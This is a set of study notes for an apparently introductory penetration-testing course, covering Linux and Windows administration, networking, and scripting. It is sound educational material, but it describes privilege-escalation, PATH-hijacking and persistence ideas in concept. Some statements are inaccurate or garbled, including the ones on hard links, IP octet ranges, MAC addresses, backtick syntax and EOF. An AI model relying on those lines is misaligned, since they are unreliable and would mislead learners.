PEN 100 Notes

Linux Basics [Part I]

1. Linux is a Unix like operating system kernel with monolithic architecture.
2. Various distributions using Linux kernel are Debian, Ubuntu, Fedora,
ArchLinux etc.
3. Command line terminal in Linux is known as Shell:
sh: Bourne Shell
bash: Bourne Again shell
ksh: Korn shell
zsh: Extended Bourne Shell
4. Linux follows File System Hierarchy (FHS) to navigate through files on
the system.
5. System enumeration: This is a fancy term for information gathering about
the system to better understand the machine we've attacked, often to
elevate our permissions.
6. Wildcard( * ) characters allow us to reference a large set of files at
once, and help manage files on the command-line (among other tasks).
7. The three most common commands used to locate files in Kali Linux are
find, locate, and which
8. Linking Files is like creating file shortcuts in other directories.
Soft Linking: Is just a reference to original file.(No data of its own)
Hard Linking: Mirrored copy of original file.(Copies the data of original
file)
9. Inode number is a unique number used to identify a file.
10. Each program in Linux has three data streams. STDIN(0), STDOUT(1),
STDERR(2).
11. Piping and redirection are means by which we may connect these
streams between different programs and files to direct data in ways we
want them to flow.
12. ">" Write to a file(Override original if exists), ">>" Append to a file "<"
Read from a file, "2>" Write a error to a file
13. Use the output from one program as the input to a second program via
piping with the "|" symbol.
14. A regular expression(RegEx) are special characters or sets of characters
that help us to search for data and match the complex pattern.
15. grep, sed, cut and awk are RegEx searching and text manipulation
commands/tools.
16. The comm command compares two text files, displaying the lines that
are unique to each one, as well as the lines they have in common.
17. If a command needs to be run, but you don’t need to interact with it for
a while and want to keep using the same terminal with other commands
while the command is executing, you can use &. The ampersand will
send the command in the background. This is a part of the Linux process
management

Linux Basics [Part II]

1. Linux User Account details are stored in etc/passwd file whereas
Password Hashes in etc/shadow file.
2. Three ways to lock a user account:
a. Using usermod -L username *or passwd -l username
b. Using chage -E to set expiration date in past.
c. Changing default shell in etc/passwd to /bin/false or /sbin/nologin.
3. The sudo command can be used to execute a command with elevated
privileges and can only be used by the users in sudo group.
4. It is possible to save the output of a command in a variable with the
following syntax: var_name=$(command)
5. The su command can be used to switch users su -l username.
6. We can use the chown command to change the ownership properties of a
file.
7. We can define rights for each category of users (u/g/o), by setting
them explicitly (with =), by adding (with +), or subtracting (with -).
Eg: chmod u +rwx, g +rw, o -r file.
8. The second way to represent rights is via an octal numeric
representation.
9. (Penetration Technique: Privilege Escalation) Two special file
permissions allows the current user to execute the file with the rights of
the owner [setuid] or within the context of the owner's group [setgid]
and is denoted using "s or S".
10. By changing the owner of a file and adding +s modification to the file, if
any user from the file group executes the file, it will execute with
owner's context and EID.
11. The sticky bit (symbolized by the letter "t") is a permission used for
temporary directories where everybody has write access but restricts
deletion of files so that only their owner or the owner of the parent
directory can delete them.
12. A Process is an instance of a running program and whenever we run a
program via our terminal, we begin a new process.
13. The quickest way to background a process is to append an ampersand
(&) to the end of the command to send it to the background immediately
after it starts.
14. The built-in jobs utility lists the jobs that are running in the current
terminal session, and fg returns a job to the foreground. Ctrl+Z is used
to suspend a job running in foreground which can then be resumed in
background using bg command.
15. One of the most useful commands to monitor processes on mostly any
Unix-like operating system is ps (short for process status).
16. It is extremely valuable to know how to monitor files and commands in
real-time during a penetration test. Two commands that help with such
tasks are tail and watch.
17. apt (Advanced Package Tool) is a set of tools that helps manage
packages, or applications like install and remove applications, update
packages, and even upgrade the entire system.
18. dpkg is the core tool used to install a package, either directly or
indirectly through APT and it does not require an Internet connection but
dpkg will not install any dependencies that the package might require.
19. The Linux-based job scheduler is known as Cron. Cron makes it possible
to schedule the execution of tasks. These tasks are usually commands
and scripts associated with system maintenance.
20. If the Backup script (user_backup.sh) has weak permissions, we may be
able to leverage this to escalate our privileges.
21. Most Unix-like systems, as well as services running on them, produce
logs within the /var/log directory.
22. Logs are also an excellent troubleshooting tool. When some command or
action fails, logs can help us understand why the unexpected
phenomenon is happening.
23. The most prevalent tools to interact with disks and filesystems are free,
dd, du, df, and mount.
24. In Linux we have to mount a filesystem before we can use it, if we were
to insert a USB drive (for example), we would need to create an
associated location somewhere in that tree.

Windows Basics [Part I]

1. On Windows, the Administrator account belongs to the user with the
highest permissions. However, many Windows processes that require
elevated permissions run under the context of a non-user account called
NT AUTHORITY\SYSTEM.
2. Windows filenames are not case sensitive, so C:\Windows\System32 and
C:\Windows\SYSTEM32 would refer to the same file.
 3. Linux stores information related to applications and its kernel in the /etc
and /proc directories respectively. Windows manages both application
and system configurations centrally in the Windows Registry.
4. Windows comes with three different command-line interfaces: cmd.exe,
PowerShell, and WMIC.
5. Windows PowerShell is built on the .NET framework and employs the use
of cmdlets to run administrative tasks. PowerShell can fully interface
with the Component Object Model (COM) and the Windows Management
Instrumentation (WMI)
6. Windows has following different commands: ls->dir, clear->cls, cp-
>copy, mv-move, rm->del, cat->type, touch->echo
7. \Roaming directory in \AppData is used for network-based logins for
roaming profiles and synchronizes the user's data when they login to the
computer.
8. \System, \System32, and \SysWOW64: These directories store dynamic-
link library (DLL) files that execute the core features of Windows and
the Windows API. \System stores 16-bit DLLs and is usually empty on
64-bit editions of Windows because 16-bit applications cannot run on 64-
bit OSs. \System32 stores either 32-bit or 64-bit DLL files, depending on
whether a 32-bit or 64-bit edition of Windows is running. \SysWOW64 is
found only on 64-bit editions of Windows, and despite its name, stores
32-bit DLLs.
9. systeminfo.exe is a Windows binary capable of extracting detailed
configuration information about the system it is run on. It can also be
run against remote machines if provided the /s option.
10. The set command can also be used to temporarily change the value of an
environment variable in the context of the current shell. The setx
command can be used to change a value permanently by modifying the
registry.
11. Microsoft has developed a suite of tools that together help make up a
robust command-line environment for system administration, collectively
called the Sysinternals System Information Utilities. Note that
Sysinternals does not come with Windows by default, but we can
download it from Microsoft's website.
12. We can use the 2> operator to redirect all errors triggered by echo to a
specified file.
13. The rmdir commmand can also be used to delete a directory that has
content within it. To do so, we'll need to use the /S option. fc
command which compares the contents of two files elegantly
14. The xcopy and robocopy commands are more robust versions of copy that
are often used in batch scripts. While xcopy has been deprecated,
robocopy is very helpful because it has a high tolerance for network
 interruptions. It also has several other powerful features that are useful
for security auditing.
15. The mklink command is used to create a symbolic link on Windows and
supports the creation of both soft and hard symbolic links. To create a
soft symbolic link to a text file we can execute mklink with no additional
options whereas for hardlink, we use employ the /h option.
16. The main difference between a softlink and hardlink is that the hardlink
retains value even after the original file is deleted.
17. Three commands to search for files and strings dir, tree, and forfiles.
One of the options with dir command that we haven't explored yet is the
/s option, which allows us to search for any file in the given folder and
any of its subfolders.
18. In Windows the find command is used to search for a string of text. Just
like find, we can use findstr to search for a specific string. However, it
can also search for multiple strings at the same time.

Windows Basics [Part II]

1. The base command to create and manage users on a Windows system is
called net. We can use it to add, remove, and modify user accounts and
group membership on a local or networked machine. The net command
contains a series of subcommands that each perform a specific function.
2. Security principal is a subject that the operating system can opt to (or
not to) authenticate. They include automated accounts, threads,
processes, groups of users, and even parts of the OS itself and are
identified by Security Identifiers (SIDs).
3. An Access Control List (ACL) is generally a dictionary of trustees and
sets of permissions they've been assigned. In Windows, each element of
an ACL is an Access Control Entry (ACE). There are six types of ACEs,
and each ACE includes a SID, a set of access rights, and several flags
that each indicate different properties.
4. Windows has three accounts categories:
a. Administrator: User account designed for the system administrator to
manage the machine.
b. Guest: Lets non-users of the machine log on temporarily with
restrictive permissions.
c. System: Used by the OS to run services that need elevated
permissions
5. A localgroup is a set of accounts that can be assigned permissions on a
local machine. Two important groups for security are Administrators and
Remote Desktop Users. Any member of Administrators has equivalent
 permissions of the Administrator account, and any member of Remote
Desktop Users can access the machine remotely if Remote Desktop.
6. User Account Control (UAC) is another security feature on Windows that
in general, is to protect against malicious actions by forcing an active
human user to manually confirm administrative actions by means of a
prompt, or message box.
7. (Penetration Technique: Privilege Escalation) Windows comes with a
command to impersonate another user called [runas]. It can be used to
elevate privileges temporarily. Since runas can execute commands with
another user's permissions, it can be useful for attackers to attempt it
if they obtain low-level access to a machine.
8. The following is the basic set of permissions assignable to files and
directories:
a. Read
b. Write
c. Read & Execute
d. Modify
e. Full Control
f. List Folder Contents
9. Inheritance allows a parent entity to propagate attributes to its children.
By default, a particular file or folder inherits the permissions of the
folder it is contained within.
10. A process is the container in which a program runs and a thread is a
single running instance of that program. In Microsoft's analogy: The
thread is the thing happening, the process is the environment in which it
happens, and the program is the procedure that the thread executes.
11. Windows processes work in two modes:
Kernel mode: It is used for the most trusted operations that the OS itself
needs to execute.
User mode: It is used for majority of user programs and applications
running on the computer.
12. smss.exe: Session Manager is the first User mode process that's
started on a Windows machine. It is primarily responsible for mapping
out virtual address space. It is spawned by System twice: one instance
spawns winlogon.exe and csrss.exe and then exits.
13. winlogon.exe: Windows Logon is responsible for not only authenticating
users, but also for loading user profiles. In addition, it performs an
array of functions even after login.
14. csrss.exe: The Client Server Runtime Process is responsible for several
background functions. It begins the shutdown sequence when
terminated, and it is the parent of the process that eventually spawns
cmd.exe.
15. explorer.exe: Windows Explorer is responsible for rendering much of the
Windows GUI shell that the user interacts with. It governs the Windows
Start Menu, the Taskbar, and the System Tray.
16. wininit.exe: Windows Startup is responsible for triggering a crucial set
of User mode applications that must run to maintain the system's
stability and functionality.
17. Libraries are repositories of functions that can easily be imported into
other programs. Windows uses Dynamic-Link Libraries (DLLs), which are
themselves written in the same format as .exe files. DLLs essentially
allow a program to call upon already-written functionality instead of
needing to perform those functions itself.
18. The Windows Registry acts as a central database for the OS. Through the
Registry, we can access both system information and user information
and it contains the most critical system information.
19. The Windows Task Scheduler allows us to schedule computer programs or
scripts to run at pre-defined times or upon certain triggers. schtasks
command enables an administrator to create, delete, query, change, run
and end scheduled tasks on a local or remote system.
20. In terms of built-in utilities, Windows comes with the fsutil set of
programs that can manage drives.
21. A stream is a property of files under NTFS that essentially allows us to
store content within arbitrary sections of the file. The dir /R option
which is useful for identifying Alternate Data Streams (ADS).

Networking Fundamentals
1. A network model is a conceptual framework that helps us understand
how we could organize communication between different devices. Once
we understand network models, we can implement various network
protocols, which describe how two or more entities (in this case,
machines) should communicate in practice.
2. There are two main reference models which describe how to connect
multiple devices. These two reference models are the OSI model (Open
Systems Interconnection) and the TCP/IP model.
3. A Protocol Data Unit (PDU) is the unit of information that is transmitted
at a certain layer. For example, flow control, the function of making
sure information gets to its intended destination, can be implemented at
several layers.
4. OSI Model consists of 7 layers:
Layer 7: At the very top of the model, the Application Layer defines how
a human or software can interact with a network.
Layer 6: The Presentation Layer is responsible for taking the data it
 receives from the layer below it, and for rearranging it so the Application
Layer can present to a user.
Layer 5: The Session Layer implements protocols that initiate, maintain,
and eventually terminate multiple different connections between
computers.
Layer 4: The Transport Layer is largely (but not solely) responsible for
making sure that data gets from Host A to Host B in proper order and on
time.
Layer 3: The Network Layer, true to its namesake, is primarily
concerned with information traveling between two or more different
networks.
Layer 2: The Data Link layer is tasked with transferring information
between hosts that are physically connected on the same network.
Layer 1: Finally, the Physical Layer transfers raw data between a
physical machine and a physical transmission medium (like a wire).
5. TCP/IP Model consists of four layers:
Layer 4: The Application Layer of TCP/IP can roughly be thought to be
similar to the combied Application, Presentation, and Session layers of
the OSI model.
Layer 3: The Transport Layer of TCP/IP attempts to answer the question
"What rules should we use to determine how machines should
communicate together regardless of the networks they happen to be on?"
Layer 2: The Internet Layer answers the question "What rules should we
use to define how information travels between networks?"
Layer 1: The Link Layer answers the question "What rules should we
use to define communication within the same physical network?"
6. To build an IP address, we take four octets and concatenate them to
form a 32-bit integer. For each of the four octets, a number between 1
and 255 is chosen. These values are called octets because 2^8 = 256.
An example of an IP address is 192.168.127.16
7. To refer to subnets more concisely, we can use something called
Classless Inter-Domain Routing (CIDR) notation. For example, the CIDR
notation for a network with a 255.255.255.0 subnet mask is "/24",
because there are 24 one-bits in the mask.
(11111111.11111111.11111111.000000000)
8. TCP is perhaps the most common Transport layer protocol. It enables
two-way communication by establishing a session between machines. A
TCP session is initiated by what's called the Three Way Handshake.
9. HTTP is the protocol of the web. It specifies rules for web clients to
retrieve content from web servers. HTTP most commonly uses port 80
whereas HTTPS uses port 443.
10. FTP allows a client to connect to, browse, send, and retrieve files to,
and from, a server. FTP is useful to know about from a security
 perspective, because it enables means of discovering information that
may not be as heavily monitored or hardened as other network services.
11. SMTP is one of several application layer protocols dedicated to e-mail.
As with other protocols, SMTP describes a conversation or negotiation
between two parties: a sender and a receiver.
12. Wireshark is a flexible application that can be used to capture network
traffic. It is usually used via its streamlined Graphical User Interface
(GUI), but it also has a command line version called tshark.
13. Tcpdump is a command-line (or CLI) based network sniffer that is
surprisingly powerful and flexible despite the lack of a graphical
interface. It is by far the most commonly-used command-line packet
analyzer and can be found on most Unix and Linux operating systems.
14. The Address Resolution Protocol (ARP) is designed to associate Network
Layer addresses to Link Layer addresses. In this case, we're concerned
with IP addresses and MAC addresses. This allows switches to transmit
Ethernet frames to their intended destination devices on a Local Area
Network (LAN).
15. Ping is a fairly ubiquitous tool that repeatedly sends ICMP messages to a
target. This can allow us to test network connectivity by letting us know
if we're able to reach the destination. It also tests for the latency of
connectivity between the two machines.
16. The Dynamic Host Configuration Protocol (DHCP) helps make sure that
any new machines that join a network can negotiate with existing
machines to receive a properly configured and unique IP address.
17. Routing tables help machines determine how they can send information to
other hosts that they may not have a direct connection with.
18. Firewalls receive, and then drop or allow, incoming and outgoing traffic
to pass through a network based on rules defined by a system or
network administrator.

Bash Scripting Basics

1. A Bash script is a plain-text file that has a series of commands that are
executed as if they had been typed at a terminal prompt.
2. When encountering single quotes, Bash interprets every enclosed
character literally with no interpretation. When enclosed in double-
quotes, certain characters such as "$", "'", and " \ " in variables will
be processed in an initial substitution pass on the enclosed text.
3. Also, Double quotes are the default when neither single nor double
quotes are specified for a string.
4. Bash interprets the "$" as the lead-in character that specifies a variable
and prints out the variable content. Eg: echo $variable
 5. The backtick character is another special character and is used to embed
commands or program names in variables. This is known as command
substitution. Eg: user1=" whoami "
6. There's also another way to get command execution using Bash
scripting. We can place the variable name in parentheses "()", preceded
by a "$" character. Eg: " user1= $(whoami) "
7. Special convention in Bash for carrying out mathematical operations
which is the use of double parentheses.If we attempt to do an operation
and one of the values is not numeric, then bash defines it as the
numerical value of zero. Eg: echo $((firstNumber+secondNumber))
8. There's another way of evaluating mathematical operations, using the let
command. This command understands the four standard mathematical
operators, and also the double-plus operator which is used to increment
or add 1 to a value.
9. Bash reserves some special variable names, as shown in the table
below.

Variable Name Description

$0 The name of the Bash script
$1 - $9 The first 9 arguments to the Bash script
$# Number of arguments passed to the Bash script
$@ All arguments passed to the Bash script
$? The exit status of the most recently run process
$USER The username of the user running the script
$UID The user identifier of the user running the script
$HOSTNAME The hostname of the machine
$RANDOM A random number
$LINENO The current line number in the script
$ $ The process ID of the current script

10. We can request user input while a script is running by using the read
command. Two of the most commonly used options include -p, which
allows us to specify a prompt, and -s, which makes the user input
silent. The latter is ideal for entering user credentials.
11. Conditional statements allow us to perform different actions based on
different conditions. The most common conditional Bash statements
include if, else, and elif.
12. Double Parentheses(let keyword alternative) is used for arithematic
operations whereas Square Brackets(test keyword alternative) are used
for comparison operations.
13. Let's review the AND (&&) Boolean operator first, which executes a
command only if the previous command succeeds (or returns true or its
numerical representation of "0").
14. When used in a command list, the OR (||) operator is the opposite of
AND (&&); it executes the next command only if the previous command
failed (returned false or non-zero).
15. In Bash, the two most predominant loop commands are for and while.
16. In terms of Bash scripting, we can think of a function as a script within
a script. This becomes very useful when we need to execute the same
code multiple times in a script.
17. Two ways in which we can declare functions:
a. function function_name { commands... }
b. function_name() { commands...}
18. The use of the double redirect (<<) into cat with a string value means to
display the following text up until, but not including, the string value.
This avoids issuing lots of echo commands!
19. We've added the -q option to suppress the output from grep. We then do
another check using the special -d form of test to check the existence
of a folder.
20. The scope of a variable is simply the context in which it has meaning. By
default, a variable has a global scope, meaning it can be accessed
throughout the entire script. In contrast, a local variable can only be
seen within the function, block of code, or subshell in which it is
defined.
21. The EOF stands for the end of file. This means that when the compiler
reaches this operator it will end the execution of the file.
cat<<EOF text... EOF

Python Scripting Basics

1. Python variables can be converted from one data type to another in a
process we call typecasting.
2. If we know a value is contained in the list but don't know the index, we
can find it by using the list index() method.
3. We can also slice out the substrings from the full string by using the
index() function. To do this, we will add .index() to the variable tag,
and inside the index function, we will add the variables.
4. If we would like to add an item to our list, we can use the append()
method. Inversely, we can remove items from a list, in the same way,
using remove().
5. In Python, a dictionary is a data structure that contains one or more
key-value pairs. We can use curly brackets to define a new dictionary
 and supply it with any initial key-value pairs.
6. Looping in programming is one way to iterate on a conditional state or
data structure. Python has two types of looping methods: for and while.
7. (Code Execution Vulnerability) Input validation is a very big reason a lot
of security vulnerabilities exist. Keeping in mind that a user may enter
special characters, characters that don't match the data type, or even
input characters that may be thousands of characters long are all
important to securely writing code.
8. To open a file, we can use the open command, set to a variable. We
need to specify the file name and the mode. Eg: f = open("data.txt",
"r")
9. For larger files, we can limit how much we are storing by only reading
one line of the file at a time using readlines() instead of read().
10. If we would like to write some data to a file, we can open the file like
before but in write (w) or append (a) mode depending on what we are
trying to accomplish.
11. To define a function, we use def followed by the name of our function.
The function definition line ends with parenthesis and a colon.
12. Sometimes, we may find that someone has already solved a complicated
task for us and provided their code as a Python module.
13. We can just import what we want and remove the need to reference a
module each time by using the from statement along with our import.
14. The requests module contains multiple functions within it. Some common
functions are: get, status_code, headers, encoding, text, and json.
15. Network sockets are endpoints for sending and receiving data across the
network. Simply put, they are the backbone of server/client
relationships.
16. There is a socket() function that has two parameters: AF_INET and
SOCK_STREAM. The AF_INET parameter specifies that the IP address will
be an IPv4 address. The SOCK_STREAM parameter specifies that the
socket will use a TCP connection.
17. Buffer size value sets the number of bytes that can be received from the
server. It can be changed to be lower or higher, up to near 64,000
bytes. Raising our buffer to that size would be impractical, and 1024
bytes is a fair amount to specify for typical usage.
18. A Web Spider is a script will download a web page, find all of the links
on that page, and recursively collect links on the website after following
all of the links and display them when complete.

PowerShell Scripting Basics

 1. Scripting is an efficient way to perform or automate repetitive tasks,
and it can be used to complete tasks on a large scale. On the Windows
operating system, we can use batch scripts in batch files to automate
tasks.
2. While Bash and most other shell environments operate by ingesting and
returning text, PowerShell works with .NET objects.
3. Windows PowerShell Integrated Scripting Engine (ISE) is a more powerful
GUI version for running PowerShell commands and scripts.
4. A command is a program that is, or has been, compiled and can be
executed standalone. A cmdlet on the other hand, is a .NET class that
works on objects. Cmdlets are lightweight and don't have the overhead
that is required by a typical command.
5. Cmdlets are named by a verb and a noun separated by a hyphen. For
example, the Get-Help. It provides information about cmdlets, which is
similar to the manual, or man, command in Linux.
6. Tab completion, more formally known as command-line completion is a
feature using which as we type the program it will attempt to guess
what we are trying to type and provide options.
7. An alias is a shortcut commands that will do the same thing as the main
command. For example, help is an alias to Get-Help. Syntax to create a
temporaray session alias: Set-Alias -Name gh -Value Get-Help
8. When performing certain operations like arithematic operations PowerShell
assumes our intentions based on the type of the first variable in the
equation.
9. One of the most important aspects of conditional statements and loops is
control flow. This is a concept where expressions are evaluated and the
program will continue to execute depending on the results of the
expressions.
10. If we get stuck in an infinite loop, one of the ways to terminate the
program is to send a signal interrupt signal by pressing the Ctrl+C
keyboard shortcut.
11. A property is a characteristic or attribute of an object, while a method,
is an action that can be executed on an object. Every object has their
own properties and methods associated with them.
12. The Get-Member cmdlet displays the properties and methods of objects.
The pipeline(|) operator connects two commands by taking the output
from the first command and using it as input for the second command.
13. A similar yet more powerful way to interact with the properties of an
object is the Select-Object cmdlet. This cmdlet selects the properties of
one or more objects.The Get-Service cmdlet displays the installed
services on the system.
14. If the Where-Object command uses one condition, we can implement
either method. However, if we need two or more conditions, we have to
use script block. Eg: Where-Object {$_.StartType -EQ "Automatic" -
And $_.ServiceName -Match "^s"}
15. PowerShell providers make the data easier to access since it's
presented in a consistent way, similar to a file system drive. Providers
are typically included in modules, and are accessible after the module
has been loaded into the current session.
16. Scope modifiers are used to determine where a variable exists. Global
scope variables are available within the whole program, while local
scope variables are available within the specific function.
Syntax: $ScopeType:(variable_name) =

17. { language-function
<actions>
}```

18. The default policy is Restricted for Windows clients, and it is

RemoteSigned for Windows servers. The Restricted policy means the
system will neither load PowerShell configuration files nor run PowerShell
scripts. The RemoteSigned policy allows the execution of PowerShell
scripts only if the script was written on the local system and not
downloaded from the Internet, or the script contains a digital signature
from a trusted publisher.
19. The last concept we will discuss is PowerShell modules, which are
packages that contain additional cmdlets, functions, providers, and
more.

Linux Networking and Services [Part I]

1. A Linux system may have the legacy net-tools installed, or instead use
iproute, the newer package of network utilities.
2. The simplest way to identify the IP address, netmask, MAC address, and
other network metrics is by using ifconfig.
3. MAC address is a physical address that cannot be changed, unlike an IP
address, its value is 6 bytes in length and each of the byte values is
represented in hexadecimal.
4. The iface is short for interface and inet is the type of connection that
will be made. The type of connection can be "static" or "dhcp"
(dynamic).
The address line contains the desired IP for the host. The netmask
specifies the network mask of the network the IP is on. The gateway is
 the IP the network needs to use to reach out to other networks. This
would normally be the network's router IP.
5. let's begin enumerating hosts that are communicating with our host.
We'll need to investigate three network utilities to do this: netstat, ss,
and arp.
6. ESTABLISHED indicates that this is an active connection. CLOSE_WAIT
means that the remote end has shut down and the host is waiting for the
socket to close. TIME_WAIT is when the socket is waiting after closing
to handle packets still in the network. LISTENING is when the host is
listening for incoming connections. SYN_SENT means the socket is
actively attempting to establish a connection.
7. Host: End Devices/Computers
Gateway: Router that connects to end network
Subnet: Smaller(sub) networks within the main network
Subnet Mask: 4-byte number to mask subnet devices
8. Another helpful ICMP utility when troubleshooting network connections is
traceroute. With this utility, the TTL (time to live) is lengthened as
compared to ping, and each hop (router) is reported back to the
originating host. This is ideal when determining how many router hops
are between a host and the target.
9. The number of hops a packet travels before being discarded by a network
is known as the time to live (TTL) or hop limit.
10. Internet Control Message Protocol (ICMP) is a network layer protocol
used to diagnose communication errors by performing an error control
mechanism.
11. Address Resolution Protocol(ARP) is responsible to find the hardware
address of a host(MAC address) from a known IP address.
12. A Domain Name System(DNS) server takes in requests for the human-
readable site name, searches a table for that name, then points the
requests to the appropriate IP. This is similar to how we might search
for a name in a physical phone book to find a phone number.
13. For any domain name like www.offsec.com it has 3 components:
a. Top Level Domain: .com
b. Domain: offsec
c. Subdomain: www
14. Secure Shell Protocol (SSH) is a client/server protocol for enabling
secure communications between two hosts. Communication over SSH is
encrypted over the network, whereas telnet (another similar client
utility) is not.
15. SSH can also be used to remotely copy files via a utility called SCP
(Secure Copy Protocol). The syntax for scp is very similar to the cp
 command, except the location of the file will contain User@host:remote-
file-path.
16. sshpass utility is designed to supply the ssh password in the command
execution, rather than having to manually enter it at the prompt. This is
useful because it means an ssh session can be opened through a script
without requiring user interaction.
17. Netcat is, most simply, a utility which reads and writes data across
network connections, using TCP or UDP protocols. Netcat can run in
either client or server mode.
18. To establish a basic chat service between two Linux machines, create a
netcat listener on one machine on a specific port and then connect to
that port using the other machine. Eg: nc -lnvp <port> & nc -nv <ip>
<port>
19. Socat is a command-line utility that establishes two bidirectional byte
streams and transfers data between them. For penetration testing, it is
similar to Netcat but has additional useful features.
Connect: socat - TCP4:<remote server's ip address>:<port>
Listen: sudo socat TCP4-LISTEN:<port> STDOUT
20. Wget is a very helpful utility for downloading files from a web server. -O
is to output file to a specific name/location. -o is to output the log file
to specified location. --recursive can be used when we want to rebuild a
website or copy an entire website to our host.
21. Another client we can use to copy files from servers is cURL, which
stands for "Client URL." curl is extremely powerful because it offers an
incredible amount of options that can be used to manipulate the request
to the server.
22. We can use nslookup and dig to identify the IP addresses of hosts by
their human-readable names. The default search record for both nslookup
and dig is the A record. This can be changed by specifying the type in
the command line like -t mx or ns or ptr or cname or txt
23. The easiest way to access an FTP server is through anonymous access.
This is when the user is anonymous and a password is not needed.
Anything can be entered in as the password, and the login will be
accepted.
24. To upload a file to a ftp server we use the put command whereas to
download a file from the server we use the get command.
25. Two types of FTP:
Active Mode: Server is reached on port 21 but responds using port 20.
Passive Mode: Server is reached on port 21 but responds using random
port.
26. Binary vs. ASCII modes are related to how the file is transferred. If the
file is a text file, ASCII mode can be used. It modifies the files to ensure
 compatibility when reading a text file, when transferred from one type of
system to another. Binary mode will keep the file in its original state,
without modifying the newline entries.

Linux Networking and Services [Part II]

1. Access Control List (ACL) is a list of rules to control access to
computer resources. This can be either in the filesystem or network. A
network ACL will typically have three actions it can take. These are
ACCEPT, DROP, and REJECT.
2. The Linux kernel has a packet filtering framework, called netfilter. The
utility that hooks into this framework is iptables, which is used to
create and/or modify ACLs for the Linux firewall.
3. In a Stateful Protocol it keeps track of the connection information, and
as a result, delivers superior performance because of continually keeping
track of information. Whereas a Stateless Protocol is one in which the
receiver is not required to keep session state from previous requests.
4. Iptables is not persistent after a reboot. So, all the rules that were
modified, addded or removed must be saved with iptables-save.
5. Sometimes, it's easier to have a frontend interface to handle the
firewall rules. There are two tools that we can use to accomplish this:
Uncomplicated Firewall (UFW) and FWBuilder.
6. The SysV Init service type is the legacy version of how Linux services
work. Despite being legacy, it is still widely in use and Systemd is
backward-compatible with it.
7. Runlevels are designations set to how a Linux system starts and what
services are running. They are divided into 7 categories. The
configuration to set a Linux system's default runlevel is in /etc/inittab.
8. service is considered to be a legacy command, so it may become less
common to find SysV Init systems in the wild. service ssh start
Systemd uses a utility called systemctl to control it. This is very similar
to the service utility, but the syntax is reversed for the service-name
and action. systemctl start ssh
9. Target-units are used in case of systemd are very similar in concept to
runlevels, in that they define what services run at each target-unit
level. Unlike runlevels, there is more flexibility to define more than 7
classifications.
10. There are also three categorizations for each target-unit: LOAD, ACTIVE,
and SUB. LOAD specifies if a target-unit is loaded in the Linux host.
ACTIVE specifies if a particular target-unit is currently active or not. SUB
specifies the status of the services running under a target-unit.
11. We can verify that the SSH service is running and listening on TCP port 22
by using the netstat command and piping the output into grep to search
the output for sshd. netstat -antp|grep sshd
12. There is another common way to create a temporary web server that
uses Python. It is useful to have a temporary solution to run on demand
and not worry about exposing ports on our Kali host that we don't need.
sudo python3 -m http.server 80

Windows Networking and Services

1. Important networking utilities like ping, tracert, arp, netstat, nbtstat,
nslookup, ipconfig, route, and more provide us with the ability to either
gather information or interact with the network settings of a Windows
device.
2. set command can used to inspect and change Windows environment
variables.Environment variables are values that impact how certain
programs work. For Windows systems, to identify them as environment
variables, they are denoted with a percent sign (%) before and after.
%temp%
3. Whenever we run a command in the CLI, we don't always need to be in
the same working directory as the command itself; instead, the
command interpreter will search for the binary. The locations where it
searches for are the values within the %PATH% variable.
4. (File Execution Vulnerability) A real-world example of how "set" can be
used by offensive operators is an attack known as "Hijack Execution
Flow". Essentially, an attacker might manipulate the %PATH%
environment variable so that their malicious program is executed instead
of the normal executable.
5. When we use set to add, delete, or change environment variables, those
changes only exist as long as the process we are currently in exists. To
make non-volatile or permanent changes to environment variables, we
must use the setx.
6. The netstat command not only shows the IP address of the source, but
also displays things like the destination IP, source and destination port,
connection state, and layers 3 and 4 protocol statistics.
7. The arp command lets us view and manipulate Address Resolution
Protocol (ARP) cache entries. Running arp -a displays ARP entries for all
network interfaces.
8. In a nutshell, name resolution is a process where numerical values, like
IP addresses, are connected to host or domain names. Under the hood,
network traffic requires IP addresses to travel from source to
destination.
 9. The nbtstat command shows information like the NetBIOS name table and
cache. It also can display the NetBT protocol information for local and
remote machines. Lastly, the /n parameter will display the name table
of the local computer.
10. The hosts file is located in the %SystemRoot%\System32\drivers\etc
folder in Windows. This is a plain text file that contains hosts-to-IP
mappings and is one of the primary locations the OS checks when it
attempts to resolve host/domain names.
11. The nslookup command will either find the IP of a domain name or the
domain name of an IP address (reverse lookup).
12. In computing, client and server are terms referring to a relationship
process. Generally, servers provide a service, like data, to clients. A
simple example is how browsers are used as a way to have a client
connect to a web server.
13. The Server Message Block(SMB) protocol allows clients to access shared
resources. Historically SMB has a reputation of being very vulnerable.
Because of this, targeting SMB (or similar services) is generally at the
top of the list for attackers.
14. The net share command helps us configure and manage shared resources
hosted on our local machine, and we can leverage net use to connect to
remote shared resources, interact with them, and manage those
connections.
15. Windows Sysinternals is a collection of freeware tools that can assist in
things like diagnosing, troubleshooting, and managing Windows systems.
Psexec is one of the CLI tools within the Sysinternals suite that has
many features, but one of the more prominent features is the ability to
launch command prompts on remote devices.
16. The network shell (netsh) command is a CLI tool that allows us to view
and manipulate networking configurations of our local Windows device.
The netsh command has two options when it comes to interacting with
the firewall: firewall and advfirewall.
17. sc command, officially known as the Service Control Manager (SCM),
which is a program that enables, disables, and interacts with Windows
services. As an offensive operator, the sc utility is powerful because we
can use it for things like system enumeration, privilege escalation, and
persistence.
18. In terms of normal operations, whenever a user runs an executable, the
program will spawn one more process. Processes may start or stop a
service, but it doesn’t always have to happen. Comparatively, all
services are processes and as mentioned previously, do not require user
interaction.
19. PsService(Part of Windows Sysinternal suite) is very similar to the sc
utility, but one thing PsService can do that sc cannot do is access a
remote system with a different user account . This can be helpful when a
certain user has the necessary permissions and we can exploit that.
20. The net command can be used to interact with numerous Windows
environment objects like users, shares, services, and account policies.
21. Remote Desktop is a feature that is native to most Windows systems. It
allows clients to use the Remote Desktop Protocol (RDP) client to
connect to servers that run on TCP port 3389 by default. The great
benefit about RDP is that we can connect to a remote computer with GUI
capabilities.

Network Scripting
1. A socket is essentially an endpoint that allows network communication to
flow between two programs running over a network. We can implement
network sockets on several different channel types.
2. The socket_family variable allows us to specify a protocol domain.
AF_INET, is used for IPv4 Internet addressing and AF_INET6 is used for
IPv6 Internet addressing. AF_UNIX is the address family for Unix Domain
Sockets (UDS). The socket type is usually either SOCK_DGRAM for the
User Datagram Protocol (UDP) or SOCK_STREAM for the Transmission
Control Protocol (TCP).
3. The socket.connect(address) method is used to initiate a connection
with the server. The method requires that we specify a single host and
port to connect on, which we defined in the host and port variables. The
socket.recv(bufsize) method allows the client to receive a TCP message
from the socket.
4. The bufsize (buffer size) argument defines the maximum amount of data
that the method can receive at any one time.
5. The telnetlib allows for an implementation of the Telnet protocol. We will
